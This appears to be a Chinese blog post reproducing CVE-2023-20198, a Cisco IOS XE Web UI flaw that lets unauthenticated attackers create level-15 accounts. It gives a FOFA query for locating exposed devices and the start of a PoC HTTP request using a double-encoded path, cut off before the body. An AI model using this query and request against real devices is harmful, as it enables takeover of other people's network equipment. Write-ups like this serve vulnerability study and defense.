当前位置:   article > 正文

Cisco IOS XE Web UI 权限提升漏洞复现(CVE-2023-20198)_/%2577eb%2575i_%2577sma_http

/%2577eb%2575i_%2577sma_http

0x01 产品简介

Web UI 是一种基于GUI的嵌入式系统管理工具,能够提供系统配置、简化系统部署和可管理性以及增强用户体验。它带有默认映像,因此无需在系统上启用任何内容或安装任何许可证。Web UI 可用于构建配置以及监控系统和排除系统故障,而无需CLI专业知识。

0x02 漏洞概述

当Cisco IOS XE 软件的web UI暴露于互联网或不受信任的网络时,未经身份验证的远程攻击者可以利用该漏洞在受影响的系统上创建具有15级访问权限的帐户。攻击者可以利用该帐户来控制受影响的系统。

利用条件需要启用HTTP Server或者HTTPS Server。

0x03 影响范围

启用了Web UI 功能的Cisco IOS XE

0x04 复现环境

FOFA:

body="<script>window.onload=function(){ url ='/webui';window.location.href=url;}</script>"

0x05 漏洞复现

PoC

  1. POST /%2577eb%2575i_%2577sma_Http HTTP/1.1
  2. Host: your-ip
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
  4. Content-Type: application/x-www-form-urlencod
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/不正经/article/detail/539311
推荐阅读
相关标签
  

闽ICP备14008679号